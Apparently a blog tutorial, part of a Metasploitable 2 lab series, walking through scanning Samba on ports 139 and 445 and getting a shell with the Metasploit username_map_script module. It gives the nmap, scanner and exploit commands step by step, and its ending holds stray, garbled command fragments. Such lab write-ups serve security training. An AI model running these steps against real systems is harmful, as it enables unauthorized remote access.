Metasploitable 2: Ports 139, 445

This is part V of the Metasploitable 2 series. In part I the lab was prepared, in part II we tested port 21, in part III we tested port 25, in part IV it was port 80. You can follow these articles here.

In this part we’re going to scan SAMBA ports 139 and 445.

SAMBA is the open source implementation of the Windows File Sharing Protocol. Let’s find more information about the service running behind these ports. Lets do a nmap scan:

> db_nmap -sV -p 139,445 192.168.231.109

And now use a scanner module:

> use auxiliary/scanner/smb/smb_version

> show options

> run

We got Samba version 3.0.20. Now search though Searchploit:

There is our attack vector. Go back to MSF and search for the module with:

> grep samba search username map script

> use exploit/multi/samba/username_map_script

> show options

> run

Execute and obtain shell:

Conclusion

In this article we scanned for SAMBA, found the version running, determine it was exploitable and obtained a shell.

> search samba

use